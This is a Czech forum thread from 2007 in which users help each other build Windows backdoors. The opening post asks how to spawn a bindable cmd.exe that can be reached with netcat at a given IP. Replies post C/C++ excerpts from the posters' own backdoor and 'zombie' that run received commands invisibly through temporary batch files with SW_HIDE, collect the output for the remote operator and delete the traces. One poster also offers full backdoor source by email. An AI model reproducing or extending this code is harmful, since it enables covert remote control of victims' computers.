| Peace, jsem mirne pokrocily v c++, umim cosi uz naprogramovat...ale vubec me nenapada jak udelat toto:
Mam rozepsanej backdoor, nemam s tim problem, sockety jsem celkem zvladnul, spojeni v pohode navazu.Ale jak udelat abych mu poslal prikaz (rekneme treba >
#cmdline 1234
)
a on mi otevrel na porte 1234 cmd.exe na ktery bych se pripojil (nc 215.123.235.42 1234)
Verim ze toto neni tak tezke{ale ani lehke}, tak snad nekdo dokaze poradit ;)
A prosím, nepište nic jako "google lamo", spíš by mi(treba i vic lidem) pomohlo kdyby někdo napsal radsi kus okomentovany kodu.thx
(odpovědět) | | rOnalD | 217.160.72.* | 26.9.2007 18:27 |
|
|
|
| Musíš použít prostředníka, to bude tvůj program, bude vykonávat příkazy do soketu vstupující a výstup bude posílat zpátky. Nemůžeš nabindovat spojení přímo přes CMD (když už tak na to je služba telnet).
(odpovědět) | |
|
|
| Ano, vsak tak jsem to myslel, bind ci pipe nebo jak se tomu rika.Ale rikal jsem at radsi sem hodis nejaky kod, uplne co nejjednodusi, aby to aspon trochu fungovalo ;)
Hlavne ne jako system(prikaz); hehe...
(odpovědět) | | rOnalD | 217.160.72.* | 26.9.2007 18:53 |
|
|
|
| Ve svy zombii pouzivam tenhle kus kodu, ktery umoznuje spoustet i shell prikazy na pozadi, pokud bychom chteli okno zobrazit, dame na zacatek prikazu 'start'. Toto narozdil od normalniho shell_exec umoznuje neviditelne spoustet i prikazy pro cmdcko, ale nadruhou stranu to neblokuje dalsi vykonavani programu, ukazalo se to jako rychle a nejlepsi reseni po hodinach googleni:
char snd[] = "echo lol > lol.txt"; //Nejaky prikaz
char cmdfile[] = "zzzcommands.bat"; //Docasny soubor
////////////////////NEJAKY_KOD
FILE *cmdf = fopen(cmdfile, "w");
fprintf(cmdf, "%s\ndel %s\n", snd, cmdfile);
fclose(cmdf);
WinExec(cmdfile,SW_HIDE); //Hide console window
//system(cmdfile); //Show console window
----------
Harvie's blog: [link] g33k-shop: [link] fs: [link]
Registered GNU/LINUX user #468114 [link]
(odpovědět) | Harvie |  |  |  283782978 | 27.9.2007 16:57 |
|
|
|
| /*
Toto je výňatek z mého backdooru, který má rozsah asi 15 stran zdrojáků, tady na začátku je iniciazace serveru apod., to už si snad někde najdeš jak se dělá
Tu dám nejdůležitější definice proměnných:
*/
#define BUFSIZE 1024
#define EXECFILENAME exec.bat
#define BUFFILENAME dump.txt
...
char buf[BUFSIZE];
FILE *fh;
string clientCMD;
string returnData;
...
SHELLEXECUTEINFO sh;
ZeroMemory(&sh, sizeof(SHELLEXECUTEINFO));
sh.cbSize = sizeof(SHELLEXECUTEINFO);
sh.lpFile = EXECFILENAME;
sh.nShow = SW_HIDE;
sh.fMask = SEE_MASK_NOCLOSEPROCESS;
... bind serveru, příjde spojení a už je to tady, příkaz je v prom clientCMD
fh = fopen(EXECFILENAME, "wb");
fprintf(fh, "@echo off\r\n%s> %s\r\nexit", clientCMD.c_str(), BUFFILENAME);
fclose(fh);
if (ShellExecuteEx(&sh)) // Splodíme proces a počkáme si na jeho smrt :))
{
if (WaitForSingleObject(sh.hProcess, 2000) != WAIT_FAILED) // Čeká se max 2s
{
fh = fopen(BUFFILENAME, "rb");
while (fgets(buf, BUFSIZE - 1, fh) != NULL)
{
returnData += buf;
}
fclose(fh);
DeleteFile(EXECFILENAME);
DeleteFile(BUFFILENAME);
}
else
{
returnData = "Executing command overrange timeout!";
}
}
else
{
returnData = "Executing command get failed!";
}
... // Tady se vrací výstup zpátky do soketu z prom. returnData, následně se soket uzavírá a čeká se na další spojení
(odpovědět) | |
|
|
| Hmmm....diky, taky by to tak slo,ale treba netcat asi nepracuje na tomto principu.Nebo ano ? Vytvari taky
soubory a spousti prikazy pres hajdnutej batak ?
(odpovědět) | | r0nalD | 217.160.72.* | 26.9.2007 20:13 |
|
|
|
| To asi ne, mě se toto řešení taky hrozně příčilo, ale pak jsem nenašel žádné jiné nenašel. Kdyby někdo měl inteligentnější způsob, tak sem s ním.
(odpovědět) | |
|
|
| Muzes pouzit - jak jsi jiz rekl - roury (pipes)... neco je o nich treba tady:
[link]
nebo se zkus tky mrknout na msdn... [link]
Btw delal jsem s tim ve vb6, kdyztak prepsat to do c++ by nemel bejt problem
(odpovědět) | | Petroff | 213.29.48.* | 26.9.2007 21:27 |
|
|
|
| nejmenuje: dobrej zdrojak :) (bez ironie)
(odpovědět) | | ( | ) | 85.132.198.* | 26.9.2007 22:50 |
|
|
|
| Zdarec, taky pracuju na backdoor, jeden uz mam hotovy ale je psany trochu jinak, veskere operace jako prace se souborovym systemem, vysilani chybovych hlasek, download a upload souboru je implementovan rucne pomovi WIN32API, zatim mam funkcni verzi kde je server v konzole a pracuji na verzi kde je server aplikace s okny. Zdrojaky tady sirit nebudu ale pokud by mel nekdo zajem tak napiste na arab3h@seznam.cz
(odpovědět) | | Arab3h | 147.229.176.* | 27.9.2007 18:04 |
|
|
|
| Arab3h taxe podivey na ten meil ,)
(odpovědět) | | ph0 | 213.19.63.* | 27.9.2007 20:11 |
|
|
|
